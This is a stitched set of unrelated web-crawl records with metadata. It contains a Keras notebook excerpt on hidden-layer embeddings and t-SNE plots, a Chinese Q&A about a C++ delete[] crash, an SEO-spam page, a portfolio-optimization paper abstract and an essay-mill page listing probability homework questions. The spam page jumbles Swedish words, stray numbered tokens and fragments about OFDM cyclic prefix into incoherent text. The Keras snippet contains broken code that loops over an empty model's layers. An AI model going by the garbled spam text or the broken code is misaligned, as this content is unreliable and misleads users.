'VarianceScaling'}, 'dtype': 'float32'}\n----------------------------------------\ndropout_1 True\nLayer Configuration:\n{'name': 'dropout_1', 'rate': 0.2, 'trainable': True}\n----------------------------------------\ndense_5 True\nLayer Configuration:\n{'kernel_regularizer': None, 'units': 512, 'bias_regularizer': None, 'bias_initializer': {'config': {}, 'class_name': 'Zeros'}, 'trainable': True, 'activation': 'relu', 'bias_constraint': None, 'activity_regularizer': None, 'name': 'dense_5', 'kernel_constraint': None, 'kernel_initializer': {'config': {'seed': None, 'mode': 'fan_avg', 'scale': 1.0, 'distribution': 'uniform'}, 'class_name': 'VarianceScaling'}, 'use_bias': True}\n----------------------------------------\ndropout_2 True\nLayer Configuration:\n{'name': 'dropout_2', 'rate': 0.2, 'trainable': True}\n----------------------------------------\ndense_6 True\nLayer Configuration:\n{'kernel_regularizer': None, 'units': 10, 'bias_regularizer': None, 'bias_initializer': {'config': {}, 'class_name': 'Zeros'}, 'trainable': True, 'activation': 'softmax', 'bias_constraint': None, 'activity_regularizer': None, 'name': 'dense_6', 'kernel_constraint': None, 'kernel_initializer': {'config': {'seed': None, 'mode': 'fan_avg', 'scale': 1.0, 'distribution': 'uniform'}, 'class_name': 'VarianceScaling'}, 'use_bias': True}\n----------------------------------------\nModel Output Tensors: Tensor(\"dense_6/Softmax:0\", shape=(?, 10), dtype=float32)\n\n\n## Extract hidden layer representation of the given data\n\nOne simple way to do it is to use the weights of your model to build a new model that's truncated at the layer you want to read.\n\nThen you can run the ._predict(X_batch) method to get the activations for a batch of inputs.\n\nmodel_truncated = Sequential()\n\nfor i, layer in enumerate(model_truncated.layers):\nlayer.set_weights(model.layers[i].get_weights())\n\nmodel_truncated.compile(loss='categorical_crossentropy', optimizer=SGD(),\nmetrics=['accuracy'])\n\n# Check\nnp.all(model_truncated.layers.get_weights() == model.layers.get_weights())\n\nTrue\n\nhidden_features = model_truncated.predict(X_train)\n\nhidden_features.shape\n\n(45000, 512)\n\nX_train.shape\n\n(45000, 784)\n\n\n#### Hint: Alternative Method to get activations\n\n(Using keras.backend function on Tensors)\n\ndef get_activations(model, layer, X_batch):\nactivations_f = K.function([model.layers.input, K.learning_phase()], [layer.output,])\nactivations = activations_f((X_batch, False))\nreturn activations\n\n\n### Generate the Embedding of Hidden Features\n\nfrom sklearn.manifold import TSNE\n\ntsne = TSNE(n_components=2)\nX_tsne = tsne.fit_transform(hidden_features[:1000]) ## Reduced for computational issues\n\ncolors_map = np.argmax(Y_train, axis=1)\n\nX_tsne.shape\n\n(1000, 2)\n\nnb_classes\n\n10\n\nnp.where(colors_map==6)\n\n(array([ 1, 30, 62, 73, 86, 88, 89, 109, 112, 114, 123, 132, 134,\n137, 150, 165, 173, 175, 179, 215, 216, 217, 224, 235, 242, 248,\n250, 256, 282, 302, 303, 304, 332, 343, 352, 369, 386, 396, 397,\n434, 444, 456, 481, 493, 495, 496, 522, 524, 527, 544, 558, 571,\n595, 618, 625, 634, 646, 652, 657, 666, 672, 673, 676, 714, 720,\n727, 732, 737, 796, 812, 813, 824, 828, 837, 842, 848, 851, 854,\n867, 869, 886, 894, 903, 931, 934, 941, 950, 956, 970, 972, 974, 988]),)\n\ncolors = np.array([x for x in 'b-g-r-c-m-y-k-purple-coral-lime'.split('-')])\ncolors_map = colors_map[:1000]\nplt.figure(figsize=(10,10))\nfor cl in range(nb_classes):\nindices = np.where(colors_map==cl)\nplt.scatter(X_tsne[indices,0], X_tsne[indices, 1], c=colors[cl], label=cl)\nplt.legend()\nplt.show()", null, "## Using Bokeh (Interactive Chart)\n\nfrom bokeh.plotting import figure, output_notebook, show\n\noutput_notebook()\n\n<div class=\"bk-root\">\n<a href=\"http://bokeh.pydata.org\" target=\"_blank\" class=\"bk-logo bk-logo-small bk-logo-notebook\"></a>\n</div>\n\np = figure(plot_width=600, plot_height=600)\n\ncolors = [x for x in 'blue-green-red-cyan-magenta-yellow-black-purple-coral-lime'.split('-')]\ncolors_map = colors_map[:1000]\nfor cl in range(nb_classes):\nindices = np.where(colors_map==cl)\np.circle(X_tsne[indices, 0].ravel(), X_tsne[indices, 1].ravel(), size=7,\ncolor=colors[cl], alpha=0.4, legend=str(cl))\n\n# show the results\np.legend.location = 'bottom_right'\nshow(p)\n\n<div class=\"bk-root\">\n<div class=\"bk-plotdiv\" id=\"e90df1a2-e577-49fb-89bb-6e083232c9ec\"></div>\n</div>\n\n\n## Exercise 1:\n\n### Try with a different algorithm to create the manifold\n\nfrom sklearn.manifold import MDS\n\n## Your code here\n\n\n## Exercise 2:\n\n### Try extracting the Hidden features of the First and the Last layer of the model\n\n## Your code here\n\n## Try using the get_activations function relying on keras backend\ndef get_activations(model, layer, X_batch):\nactivations_f = K.function([model.layers.input, K.learning_phase()], [layer.output,])\nactivations = activations_f((X_batch, False))\nreturn activations" ]
[ null, "https://wizardforcel.gitbooks.io/deep-learning-keras-tensorflow/content/img/mnist.png", null, "https://wizardforcel.gitbooks.io/deep-learning-keras-tensorflow/content/img/3.1 Hidden Layer Representation and Embeddings_16_1.png", null, "https://wizardforcel.gitbooks.io/deep-learning-keras-tensorflow/content/img/3.1 Hidden Layer Representation and Embeddings_18_1.png", null, "https://wizardforcel.gitbooks.io/deep-learning-keras-tensorflow/content/img/3.1 Hidden Layer Representation and Embeddings_23_0.png", null, "https://wizardforcel.gitbooks.io/deep-learning-keras-tensorflow/content/img/3.1 Hidden Layer Representation and Embeddings_23_1.png", null, "https://wizardforcel.gitbooks.io/deep-learning-keras-tensorflow/content/img/3.1 Hidden Layer Representation and Embeddings_36_1.png", null, "https://wizardforcel.gitbooks.io/deep-learning-keras-tensorflow/content/img/3.1 Hidden Layer Representation and Embeddings_36_2.png", null, "https://wizardforcel.gitbooks.io/deep-learning-keras-tensorflow/content/img/3.1 Hidden Layer Representation and Embeddings_60_0.png", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.54516375,"math_prob":0.92043704,"size":16430,"snap":"2019-51-2020-05","text_gpt3_token_len":4493,"char_repetition_ratio":0.15999027,"word_repetition_ratio":0.11305241,"special_character_ratio":0.36968958,"punctuation_ratio":0.23324573,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.99170864,"pos_list":[0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16],"im_url_duplicate_count":[null,2,null,1,null,1,null,1,null,1,null,1,null,1,null,1,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2020-01-22T13:19:30Z\",\"WARC-Record-ID\":\"<urn:uuid:2341f69f-5143-4b4f-a637-7a93bee74dbb>\",\"Content-Length\":\"93939\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:174053c9-e767-4b0a-bf92-64996aee213e>\",\"WARC-Concurrent-To\":\"<urn:uuid:6f4117b6-a2c5-4ac4-b788-40558a4a8894>\",\"WARC-IP-Address\":\"107.170.1.165\",\"WARC-Target-URI\":\"https://wizardforcel.gitbooks.io/deep-learning-keras-tensorflow/content/3.1%20Hidden%20Layer%20Representation%20and%20Embeddings.html\",\"WARC-Payload-Digest\":\"sha1:JDKH3NGCBNUOZ546COKDLF5M7HNNO65W\",\"WARC-Block-Digest\":\"sha1:WYRW2ZX3JQFV6QHNMA36EUU3IKDEYAPW\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2020/CC-MAIN-2020-05/CC-MAIN-2020-05_segments_1579250607118.51_warc_CC-MAIN-20200122131612-20200122160612-00049.warc.gz\"}"}
https://ask.csdn.net/questions/368834
[ "", null, "2017-03-14 08:32\n\n# 内存删除出现问题,在delete[] 处程序运行中断,希望大家能帮我看一下问题出在哪里。", null, "`````` #define _CRT_SECURE_NO_WARNINGS\n#include <iostream>\n#include <iomanip>\n#include <math.h>\n#include <ctime>\n#include <Windows.h>\nusing namespace std;\n\nbool compare(const char *s, const char *q, int n)\n{\nint i = 0;\nwhile (i<n)\n{\nif (q[i++] != s[i++])\nreturn false;\n}\nif (i = n && (s[n] - ' ' == 0 || s[n] - '\\n' == 0 || s[n] == NULL))\nreturn true;\nelse\nreturn false;\n}\n\nint Triangle_num(char* fname)\n{\nFILE *fp;\nif ((fp = fopen(fname, \"r \")) == NULL)\n{\nprintf(\"Can't open file\");\nexit(1);\n}\n\nint npoint = 0; //点个数\nint count = 0; //三角面片个数\n\nwhile (!feof(fp)) //feof()函数为判断文件是否结束,C语言\n{\nchar f;\nfgets(f, 256, fp);\nif (compare(strtok(f, \" \"), \"vertex \", 6))\n{\nif (++npoint == 3)\n{\ncount++;\nnpoint = 0;\n}\n}\n}\nfclose(fp);\nreturn count;\n}\n\nvoid main()\n{\nchar *a, *b;\na = new char;\nb = new char;\na = \"C:\\\\Users\\\\Huan\\\\Desktop\\\\stl\\\\12workpiece.STL\";\nb = a;\nTriangle_num(a);\nsystem(\"pause\");\n\ndelete[] b;//增加delete之后出现报错\n}\n``````\n• 点赞\n• 写回答\n• 关注问题\n• 收藏\n• 复制链接分享\n• 邀请回答\n\n#### 2条回答\n\n• 用一段代码就知道问题在哪里了:\n\n`````` #include <stdio.h>\n\nint main(int argc, char **argv)\n{\nchar *a, *b;\na = new char;\nb = new char;\n\nprintf(\"a: %p b: %p\\n\", a, b);\na = \"C:\\\\Users\\\\Huan\\\\Desktop\\\\stl\\\\12workpiece.STL\";\nb = a;\nprintf(\"a: %p b: %p\\n\", a, b);\n\nreturn 0;\n}\n``````\n\n终端输出:\na: 0x80010288 b: 0x800102c0\na: 0x403070 b: 0x403070\n\nnew 了 a 和 b之后,这时 a地址是0x80010288 b地址是: 0x800102c0\n执行了a = \"C:\\Users\\Huan\\Desktop\\stl\\12workpiece.STL\";之后。a的地址又指向字符串所在的内存。\n你delete的时候,将会去释放字符串的内存,而这个内存是不用去释放的。真正需要释放的new出来的内存却没有释放,所以还有内存泄露的问题。\n\n点赞 1 评论 复制链接分享\n• `````` char *a, *b;\na = new char;\nb = new char;\nstrcpy(a,\"C:\\\\Users\\\\Huan\\\\Desktop\\\\stl\\\\12workpiece.STL\");\n\nb = a; // a 和 b 指向同一块区域\n//Triangle_num(a);\n//system(\"pause\");\n\ndelete a; 释放其中之一就可以\n``````\n点赞 1 评论 复制链接分享" ]
[ null, "https://profile.csdnimg.cn/4/6/E/4_cichaqiu4015", null, "https://img-ask.csdn.net/upload/201703/14/1489480300_178843.png", null ]
{"ft_lang_label":"__label__zh","ft_lang_prob":0.52136964,"math_prob":0.986258,"size":500,"snap":"2021-21-2021-25","text_gpt3_token_len":281,"char_repetition_ratio":0.098790325,"word_repetition_ratio":0.06896552,"special_character_ratio":0.422,"punctuation_ratio":0.26126125,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.98125196,"pos_list":[0,1,2,3,4],"im_url_duplicate_count":[null,1,null,2,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2021-05-10T01:43:17Z\",\"WARC-Record-ID\":\"<urn:uuid:438086c0-86ab-45be-8cf5-1e81042660f9>\",\"Content-Length\":\"224117\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:755a008e-ea5d-47b7-8c1d-77e90dbc350e>\",\"WARC-Concurrent-To\":\"<urn:uuid:1c4496d7-ea30-4da7-abe6-1b3bef3c8567>\",\"WARC-IP-Address\":\"47.95.50.136\",\"WARC-Target-URI\":\"https://ask.csdn.net/questions/368834\",\"WARC-Payload-Digest\":\"sha1:ISZ2MVZFYGTEK76UCLB4YOMLWSCSIPVW\",\"WARC-Block-Digest\":\"sha1:BFGEMBEV2NKMJGRHN2567EZRPNF3A4LP\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2021/CC-MAIN-2021-21/CC-MAIN-2021-21_segments_1620243989030.65_warc_CC-MAIN-20210510003422-20210510033422-00359.warc.gz\"}"}
https://skatterzngqs.netlify.app/34117/93241.html
[ "# Abkuerzungsverzeichnis_TK_IT\n\nSökresultat - DiVA\n\n24432. navigation 25129. prefix. 25130. wipe. Circular convolution, also known as cyclic convolution, is a special case of periodic convolution, which is the convolution of two periodic functions that have the same period.", null, "But the wireless channel does not perform circular convolution, it performs linear convolution. So the trick is to make this linear convolution appear as circular convolution by appending a cyclic prefix. The result is that equalization can be performed at the receiver by simple division. cyclic prefix N data [ ] [ ] ~ [ ] [ ] > @ [ ] [ ] 0 0 y n h k x n k h k x n k h n x n k N k ¦ P P – In a practical system, we can • 1. Add circular prefix to the data • 2.\n\n## TeleTrafic Probability Distribution Laplace Transform - Scribd\n\ndiktat 24431. circular. 24432.\n\n### hardie board shears harbor freight - KENT JANSSON UTVECKLING\n\nIt also allow some slop in the receiver's symbol clock. The L-point circular convolution of x1[n] and x2[n] is shown in OSB Figure 8.18(e), which can be formed by summing (b), (c), and (d) in the interval 0 ≤ n ≤ L − 1. Since the length of the linear convolution is (2L-1), the result of the 2L-point circular con­ volution in OSB Figure 8.18(f) is identical to the result of linear convolution.", null, "channel to  23 Aug 2019 Response (CIR) as a circular convolution during frequency domain equalization. Cyclic prefix is detached at the receiver, but its duration may  3 Aug 2020 In earlier work, we have shown that fast-convolution (FC) processing is a very transform (FFT)-based circular convolutions using partly overlapping 128 because this would lead to non-integer cyclic prefix (CP) lengt 14 Dec 2019 Copying the end of the payload and transmitting as the cyclic prefix ensures that there is a 'circular' convolution between the transmitted signal  Also the circular convolution can be applied between the OFDM signal and the channel response to model the transmission system. Figure 2.\nKöpa film uppsala", null, "cyclic prefix ofdm Hai, I am new to OFDMwas reading up a few articles on OFDM and came across cyclic prefix quite frequently..Can someone please explain what this is and why it is used..??\n\nSince the length of the linear convolution is (2L-1), the result of the 2L-point circular con­ volution in OSB Figure 8.18(f) is identical to the result of linear convolution. 2016-05-26 Circular Convolution: Key Properties 18 Consider an N-point signal x[n] Cyclic Prefix (CP) insertion: If x[n] is extended by copying the last samples of the symbols at the beginning of the symbol: Key Property 1: Key Property 2: , 0 1,1 x n n N xn x n N v n Of the cyclic prefix so addition of cyclic prefix of the Cyclic Prefix, so addition of Cyclic Prefix which is abbreviated as CP has resulted in a circular convolution at the output of adding a Cyclic Prefix.\nEu deklaration 2021", null, "lana pengar pa 5 minuter\na kassa metall regler\nhur många rötter har en kindtand\ngingipain inhibitor alzheimer\n\n### WikiExplorer/has_IW_link_to_EN_en.dat.csv at master · kamir\n\n“OFDM and SC-FDMA lectures” is published by EventHelix in LTE — Long Term Evolution. циклическая свёртка First, this paper presents an analysis of frequency-domain approaches to show that traditional circular-convolution based approaches cannot perfectly suppress   7 Nov 2020 convolution of the signal and channel to a circular convolution and. thereby causing the FFT of the circularly convolved signal and.\n\nHarris som ses i timmarna\nprototype en javascript\n\n### Matematisk ordbok för högskolan\n\nMatrix Method to Calculate Circular ConvolutionWatch more videos at https://www.tutorialspoint.com/videotutorials/index.htmLecture By: Ms. Gowthami Swarna, T CP is critically needed as it turns the linear convolution to circular convolution causing a much easier equalization technique in the frequency domain , how to determine the length of cyclic Thus by appending a cyclic prefix to the channel input the linear convolution from ELECTRICAL ECSE 493 at McGill University Well, the cylic prefix exists to combat ISI and the contents itself (tail of the symbol) lends itself to making the channel look like a circular convolution.So it really has a dual purpose, and my question is not the contents of the cylic prefix, but how its existence will remove ISI >Could anyone please explain how Cyclic Prefix in OFDM system converts >linear convolution to the circular convolution? Remember that the driving impairment is the channel impulse response, which has some length in time that is a significant portion of the OFDM symbol period. convolution of the signal and channel to a circular convolution and Cyclic prefix acts as a buffer region where delayed information from the previous symbols can get stored. Periodic or Circular ConvolutionWatch more videos at https://www.tutorialspoint.com/videotutorials/index.htmLecture By: Ms. Gowthami Swarna, Tutorials Point In the high-speed railway wireless communication, a joint channel estimation and signal detection algorithm is proposed for the orthogonal frequency division multiplexing (OFDM) system without cyclic prefix in the doubly-selective fading channels. Our proposed method first combines the basis expansion model (BEM) and the inter symbol interference 2020-11-17 · Unfortunately, linear convolution, not circular convolution, is a good model for the effects of wireless propagation per (5.87). It is possible to mimic the effects of circular convolution by modifying the transmitted signal with a suitably chosen guard interval." ]
[ null, "https://picsum.photos/800/600", null, "https://picsum.photos/800/613", null, "https://picsum.photos/800/640", null, "https://picsum.photos/800/638", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.8241319,"math_prob":0.9510636,"size":5900,"snap":"2023-14-2023-23","text_gpt3_token_len":1401,"char_repetition_ratio":0.18012212,"word_repetition_ratio":0.08483563,"special_character_ratio":0.21491526,"punctuation_ratio":0.08574181,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.97865975,"pos_list":[0,1,2,3,4,5,6,7,8],"im_url_duplicate_count":[null,null,null,null,null,null,null,null,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2023-03-21T03:52:41Z\",\"WARC-Record-ID\":\"<urn:uuid:8ffba199-bfd3-47ac-ab54-8052c724162a>\",\"Content-Length\":\"11565\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:b4b086cc-9831-476f-b6b0-52ab57ba8a7c>\",\"WARC-Concurrent-To\":\"<urn:uuid:fabcd339-8758-4cbb-9ccc-a3c4de9f59aa>\",\"WARC-IP-Address\":\"35.231.210.182\",\"WARC-Target-URI\":\"https://skatterzngqs.netlify.app/34117/93241.html\",\"WARC-Payload-Digest\":\"sha1:2TLDNSNEMPLPOTXFAPCOFU362BSZOIYN\",\"WARC-Block-Digest\":\"sha1:MMFACXHNIFKF4ZKAD37MVEHPN4RIJWD5\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2023/CC-MAIN-2023-14/CC-MAIN-2023-14_segments_1679296943625.81_warc_CC-MAIN-20230321033306-20230321063306-00267.warc.gz\"}"}
https://hungary.pure.elsevier.com/en/publications/instability-of-portfolio-optimization-under-coherent-risk-measure
[ "# Instability of portfolio optimization under coherent risk measures\n\nI. Kondor, István Varga-Haszonits\n\nResearch output: Contribution to journalArticle\n\n5 Citations (Scopus)\n\n### Abstract\n\nIt is shown that the axioms for coherent risk measures imply that whenever there is a pair of portfolios such that one of them dominates the other in a given sample (which happens with finite probability even for large samples), then there is no optimal portfolio under any coherent measure on that sample, and the risk measure diverges to minus infinity. This instability was first discovered in the special example of Expected Shortfall which is used here both as an illustration and as a springboard for generalization.\n\nOriginal language English 425-437 13 Advances in Complex Systems 13 3 https://doi.org/10.1142/S0219525910002591 Published - Jun 2010\n\n### Keywords\n\n• Coherent risk measures\n• estimation\n• expected shortfall\n• financial risk\n• portfolio optimization\n\n### ASJC Scopus subject areas\n\n• Control and Systems Engineering\n• General\n\n### Cite this\n\nInstability of portfolio optimization under coherent risk measures. / Kondor, I.; Varga-Haszonits, István.\n\nIn: Advances in Complex Systems, Vol. 13, No. 3, 06.2010, p. 425-437.\n\nResearch output: Contribution to journalArticle\n\nKondor, I. ; Varga-Haszonits, István. / Instability of portfolio optimization under coherent risk measures. In: Advances in Complex Systems. 2010 ; Vol. 13, No. 3. pp. 425-437.\n@article{ce3c1f1033b340f98edcfceb450808e4,\ntitle = \"Instability of portfolio optimization under coherent risk measures\",\nabstract = \"It is shown that the axioms for coherent risk measures imply that whenever there is a pair of portfolios such that one of them dominates the other in a given sample (which happens with finite probability even for large samples), then there is no optimal portfolio under any coherent measure on that sample, and the risk measure diverges to minus infinity. This instability was first discovered in the special example of Expected Shortfall which is used here both as an illustration and as a springboard for generalization.\",\nkeywords = \"Coherent risk measures, estimation, expected shortfall, financial risk, portfolio optimization\",\nauthor = \"I. Kondor and Istv{\\'a}n Varga-Haszonits\",\nyear = \"2010\",\nmonth = \"6\",\ndoi = \"10.1142/S0219525910002591\",\nlanguage = \"English\",\nvolume = \"13\",\npages = \"425--437\",\njournal = \"Advances in Complex Systems\",\nissn = \"0219-5259\",\npublisher = \"World Scientific Publishing Co. Pte Ltd\",\nnumber = \"3\",\n\n}\n\nTY - JOUR\n\nT1 - Instability of portfolio optimization under coherent risk measures\n\nAU - Kondor, I.\n\nAU - Varga-Haszonits, István\n\nPY - 2010/6\n\nY1 - 2010/6\n\nN2 - It is shown that the axioms for coherent risk measures imply that whenever there is a pair of portfolios such that one of them dominates the other in a given sample (which happens with finite probability even for large samples), then there is no optimal portfolio under any coherent measure on that sample, and the risk measure diverges to minus infinity. This instability was first discovered in the special example of Expected Shortfall which is used here both as an illustration and as a springboard for generalization.\n\nAB - It is shown that the axioms for coherent risk measures imply that whenever there is a pair of portfolios such that one of them dominates the other in a given sample (which happens with finite probability even for large samples), then there is no optimal portfolio under any coherent measure on that sample, and the risk measure diverges to minus infinity. This instability was first discovered in the special example of Expected Shortfall which is used here both as an illustration and as a springboard for generalization.\n\nKW - Coherent risk measures\n\nKW - estimation\n\nKW - expected shortfall\n\nKW - financial risk\n\nKW - portfolio optimization\n\nUR - http://www.scopus.com/inward/record.url?scp=77954596262&partnerID=8YFLogxK\n\nUR - http://www.scopus.com/inward/citedby.url?scp=77954596262&partnerID=8YFLogxK\n\nU2 - 10.1142/S0219525910002591\n\nDO - 10.1142/S0219525910002591\n\nM3 - Article\n\nAN - SCOPUS:77954596262\n\nVL - 13\n\nSP - 425\n\nEP - 437\n\nJO - Advances in Complex Systems\n\nJF - Advances in Complex Systems\n\nSN - 0219-5259\n\nIS - 3\n\nER -" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.8762112,"math_prob":0.74747133,"size":2842,"snap":"2020-10-2020-16","text_gpt3_token_len":699,"char_repetition_ratio":0.1250881,"word_repetition_ratio":0.5833333,"special_character_ratio":0.252639,"punctuation_ratio":0.091836736,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.961598,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2020-02-21T14:02:54Z\",\"WARC-Record-ID\":\"<urn:uuid:f8ddcd8c-0ebf-4a8b-8b6a-184dce25de7d>\",\"Content-Length\":\"30486\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:9cc612f1-d5e5-44a5-a33f-42f0560728b2>\",\"WARC-Concurrent-To\":\"<urn:uuid:dea1ca41-a90d-49de-8d95-9a30cad7548c>\",\"WARC-IP-Address\":\"52.209.51.54\",\"WARC-Target-URI\":\"https://hungary.pure.elsevier.com/en/publications/instability-of-portfolio-optimization-under-coherent-risk-measure\",\"WARC-Payload-Digest\":\"sha1:EFSK6X3MLO2R36C6NWTAO37LHML7YARN\",\"WARC-Block-Digest\":\"sha1:5LBKBMBSATLQZCQIJHKF4ZJWUJE25DQE\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2020/CC-MAIN-2020-10/CC-MAIN-2020-10_segments_1581875145529.37_warc_CC-MAIN-20200221111140-20200221141140-00141.warc.gz\"}"}
https://essaywritersexpert.com/assignment-week-3-exercise-course-math-201b2-summmer-2014/
[ "# Assignment: week 3 exercise course: math 201(b2) summmer 2014\n\nAssignment: Week 3 Exercise\n\nCourse: Math 201(B2) Summmer 2014\n\n1)      Determine which of the following nubers could not represent the probability of an event.\n\n0,0.025,-0.7,60%,660/1299.55/42\n\n2. Identify the sample space of the probability experiment and determine the number of outcomes in the sample space\n\nRandomly choosing a multiple of 3 between 1 and 20\n\n3. Determine the number of outcomes in the event. Decide weather the event is a simple event or not.\n\nYou randomly select one card from a standard deck. Event C is selecting a red ace.\n\n4. You randomly select one card from a standard deck. Event A is selecting a three. Determine the number of outcomes in event A. Then decide whether the event is a simple event or not.\n\nThe number of outcomes in the event A is —\n\nIs event A a simple event?\n\n5. Determine whether the statement is true or false. If it is false, rewrite it as a true statement.\n\nIf you roll a six sided die six times, you will roll an even number at least one.\n\n6. A random number generator is used to select a number from 1 to 100. What is the probability of selecting the number 123?\n\nChoose the correct probability below.\n\n7. Consider a company that selects employees for random drug tests. The company uses a computer to randomly select employees’ numbers that range from 1 to 5632. Find the probability of selecting a number less than 1000. Find the probability of selecting a number greater than 1000.\n\n8. A family has four children. Use the tree diagram to answer each question.\n\n9. You go to work for three days. Make an on-time/late tree diagram for the three days.\n\nChoose the correct tree diagram below.\n\n10. What is the probability that a registered voter voted in the election?\n\n11. Use the frequency distribution, which shows the responses of a survey of college students when asked “How often do you wear a seat belt when riding in a car driven by someone else?” Find the following probabilities of responses of college students from the survey chosen at random.\n\n12. Use the bar graph below, which shows the highest level of education received by employees of a company, to find the probability that the highest level of education for an employees chosen at random is B.\n\n13.  When two purple flowers (RB) are crossed, there are four equally likely possible outcomes for the genetic makeup of the offspring’s, red (RR), purple(RB) and blue(bb). If two purple snapdragons are crossed. What is the probability that the offspring will be (a) purple,(b) red and (c) blue?\n\n14. Determine whether the events E and F are independent or dependent. Justify your answer.\n\na)      E: A person having a high GPA\n\nF: The same person being highly organized.\n\nb)      E: A randomly selected person coloring her hair black.\n\nF: Another randomly selected person coloring her hair blond.\n\nc)       E: The war in a major oil-exporting country.\n\nF: The price of gasoline.\n\n15. Researcher found that people with depression are three times more likely to have a breathing related sleep disorder than people who are not depressed. Identify the two events described in the study. Do the results indicated that the events are independent or dependents?\n\nIdentify the two events. Choose the correct answer below.\n\nAre the event independent or depedent?\n\n16. In the general population, one woman in ten will develop breast cancer. Research has shown that 1 woman in 650 carries a mutation of the BRCA gene. Eight out of 10 women  with this mutation develop breast cancer.\n\na. Find the probability that a randomly selected woman will develop breast cancer given that she has a mutation of the BRCA gene.\n\nb. Find the probability that a randomly selected woman will carry the mutation of the BRCA gene and will develop breast cancer.\n\nc. Are the events of carrying this mutation and developing breast cancer independent or dependent?\n\n17. The table below shows the results of a survey in which 146 families were asked if they own a computer and if they will be taking a summer vacation this year.\n\nTable.\n\na)      Find the probability that a randomly selected family is not taking summer vacation this year.\n\nb)      Find the probability that a randomly selected family owns a computer\n\nc)       Find the probability a randomly selected family is taking a summer vacation this year given that they own a computer.\n\nd. Find the probability a randomly selected family is taking a summer vacation this year  and owns a computer.\n\ne). Are the events of owing a computer and taking a summer5 vacation this year independent or dependent events?\n\n18. Suppose 90% of kids who visits a doctor have a fever and 25% of kids with a fever have sore throats. What’s the probability that a kids who goes to the doctor has a fever and a sore throats.?\n\n19. The table below shows the result of a survey in which 141 men and 145 women workers ages 25 to 64 were asked if they have at least one month ‘s income set aside for emergencies.\n\nComplete parts (a) through (d)\n\nTabel:\n\n(a)    Find the probability that a randomly selected worker has one month’s income or more set aside for emergencies.\n\n(b)   Given that a randomly selected worker is a male, find the probability that the worker has less than one month’s income.\n\n(c)    Given that a randomly selected worker has one month’s income or more, , find the probability that the worker is a female.\n\n(d)   Are the events “having less than one month’s income saved “ and being male” independent or dependent?\n\n20.          About 19% of the population of a large country is hopelessly romantic. If two are randomly selected, what is the probability both are hopelessly romantic? What is the probability at least one is hopelessly romantic?\n\n21. A distribution center receives shipments of a products from three different factories in the quantities of 60, 40 and 20. Three times a product is selected at random, each time without replacement. Find the probability that (a) all three products come from the third factory and (b) none of the here products come from the third factory.\n\n22. By rewriting the formula for the multiplication rule, you can rewrite a formula for finding conditional probabilities. The conditional probability of event B occurring, given that event A has occurred, is P(B/ A) = P(A and B)/P(A). Use the information below to find the probability that  a  fight departed on time given that it arrives on time.\n\nThe probability that an airplane flight departs on time is 0.89.\n\nThe probability that a flight arrive on time is 0.87.\n\nThe probability that a flight departs and arrives on time is 0.82.\n\n23. Determine whether the statement is true or false. If it is false, rewrite it as a true statement.\n\nIt two events are mutually exclusive; they have no outcomes in common.\n\n24. Decide if the events shown in the venn  diagram are mutually exclusive.\n\nAre the events mutually exclusive?\n\n25. Decide if the events are mutually exclusive.\n\nEvent A: Randomly selecting someone who owns a car.\n\nEvent B: Randomly selecting a married male\n\nAre the two events mutually exclusive?\n\n26. During a 52- week period ,a company paid overtime wages for 19 weeks and hired temporary help for 9 weeks. During 5 weeks, the company paid overtime and hired temporary help.\n\nComplete parts(a) and (b) below.\n\n(a)    Are the event” selecting a week that contained overtime wages” and selecting a week that contained temporary help wages” mutually exclusive?\n\n(b)   If an auditor randomly examined the payroll records for only one week, what is the probability that the payroll for that week contained overtime wages or temporary help wages.\n\n27.          The percent distribution of live multiple- delivery births (three or more babies) in a particular year for women 15 to 54 years old shown in the pie chart. Find each probabilty.\n\nPie Chart ( number of multiple Birth)\n\na.       Randomly selecting a mother 30-39 years old.\n\nb.      Randomly selecting a mother not 30 -39 years old.\n\nc.       Randomly selcting a mother less than 45 years old.\n\nd.      Randomly selecting a mother at least 20 year old.\n\n28. Find P(A or B or C) for the given probabilities.\n\nP(A)=0.33, P(B)=0.23, P(C)=0.16\n\nP(A and B) = 0.13, P(A and C) =0.03, P(B and C) = 0.07\n\nP(A and B and C) = 0.01\n\n29. Decide if the situation invovles permutations, combinations, or neither. Explain your resonsing.\n\nThe number of ways a three – member committee can be chosen from 10 people.\n\nDoes the situation involve permutaion , combinations or neither ? choose the correct answer below.\n\n30. Space shuttle astronauts each consume an average of 3000 calories per day. One meal normally consists of a main dish, a vegetable dish and two different desserts. The astronauts can choose from 11 main dishes, 7 vegetable dishes and 12 desserts.  How many different meals are possible?\n\n31. Outside a home, there is an 8 –key keypad with letters A,B, C, D,E, F G & H that can be used to open the garage if the correct eight- letter code  is entered. Each key may be used only once. How many codes are possible.\n\n32. Suppose Grant is going to burn a compact disk (CD) that will contain 11 songs. In how many ways can grant arrange the 11 songs on the CD?", null, "" ]
[ null, "https://blueribbonwriters.com/wp-content/uploads/2020/01/order-supreme-essay.jpg", null ]
